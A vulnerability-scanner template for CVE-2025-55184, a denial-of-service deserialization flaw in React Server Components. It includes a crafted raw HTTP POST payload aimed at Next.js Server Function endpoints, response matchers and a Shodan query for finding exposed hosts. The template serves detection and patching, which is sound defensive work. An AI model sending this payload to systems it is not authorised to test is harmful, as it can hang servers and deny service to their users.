id: CVE-2025-55184

info:
  name: React Server Components - DOS
  author: DhiyaneshDk,CyberTechAjju
  severity: high
  description: |
    React Server Components 19.0.0 to 19.2.1 including react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack contain an insecure deserialization vulnerability caused by unsafe payload deserialization in Server Function endpoints, letting unauthenticated attackers cause denial of service by hanging the server process.
  impact: |
    Unauthenticated attackers can cause the server to hang indefinitely, resulting in denial of service and preventing legitimate requests.
  remediation: |
    Update to the latest version beyond 19.2.1.
  reference:
    - https://vercel.com/kb/bulletin/security-bulletin-cve-2025-55184-and-cve-2025-55183#patched-versions
    - https://www.facebook.com/security/advisories/cve-2025-55184
    - https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Next.js"
  tags: cve,cve2025,react,headless,nextjs,react,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/x-component
        Content-Type: application/x-www-form-urlencoded
        Next-Action: x

        0=["$F1"]&1={"id":"x","bound":null}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - "contains(content_type, 'text/plain')"
          - "status_code == 404"
          - 'contains(body, "Server action not found")'
        condition: and
# digest: 490a0046304402205898f2f1bc1b4a7bb3a8ace17c6e57457539f1a4088a3f3222e57394394dc47102200e92451037cba0f1d6fe84a963e6323e60ceafc2e5a4972f05e1ff9c1466918e:922c64590222798bb761d5b6d8e72950